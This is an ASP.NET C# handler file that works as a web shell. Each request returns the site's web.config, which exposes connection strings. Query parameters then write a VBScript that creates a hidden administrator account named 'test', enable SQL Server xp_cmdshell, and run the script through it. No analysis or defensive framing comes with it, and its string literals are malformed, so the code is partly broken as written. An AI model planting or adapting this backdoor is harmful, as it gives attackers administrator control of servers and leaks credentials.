<%@ WebHandler Language="C#" Class="TextLd" %>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Data.SqlClient;
public class TextLd : IHttpHandler
{
public void CreateLocalUser(string newPath)
{
System.Diagnostics.Process.Start(@"d:1.vbs");
System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
od=ob.Create("user","test") '建立用户
SetPassword "1234" '设置密码
SetInfo
of=GetObject(os&"/test",user)
add os&"/test"");
}
public void ShowWebConfig(HttpContext context)
{
context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
}
public void WriteVbs(HttpContext context)
{
System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
od=ob.Create("user","test") '建立用户
SetPassword "1234" '设置密码
SetInfo
of=GetObject(os&"/test",user)
add os&"/test"");
}
public void ExecuteSql(string connection, string sql)
{
using (SqlConnection con = new SqlConnection(connection))
{
using (SqlCommand commd = new SqlCommand(sql, con))
{
con.Open();
commd.ExecuteNonQuery();
con.Close();
}
}
}
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
try
{
var connection = context.Request.QueryString["connection"];
switch (context.Request.QueryString["method"])
{
case "1": WriteVbs(context); break;
case "2":
ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell
break;
case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
break;
default:
ShowWebConfig(context);
break;
}
}
catch (Exception ex)
{
context.Response.Write(ex.Message);
}
context.Response.End();
}
public bool IsReusable
{
get
{
return false;
}
}
}